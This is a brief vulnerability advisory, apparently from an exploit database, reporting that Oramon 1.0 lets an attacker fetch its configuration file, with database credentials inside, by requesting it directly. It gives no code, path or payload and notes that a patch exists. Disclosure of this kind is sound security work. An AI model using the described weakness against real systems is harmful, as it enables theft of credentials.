Vendor: Oramon
By: ahmadbady
CVSS: 7.5 (HIGH)
Bypass Config Download Vulnerability
CWE: N/A
Product Name: Oramon
Affected Version From: Oramon 1.0
Affected Version To: Oramon 1.0
Patch Exists: YES
Related CWE: N/A
CPE: a:oramon:oramon
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows, Linux, Mac
2008
Bypass Config Download Vulnerability
Oramon is vulnerable to a configuration file download bypass. An attacker can download the application's configuration file, which contains the database username and password, by requesting the file directly. The flaw exists because the application does not properly validate user-supplied input.
Mitigation:
The vendor has released a patch to address this vulnerability.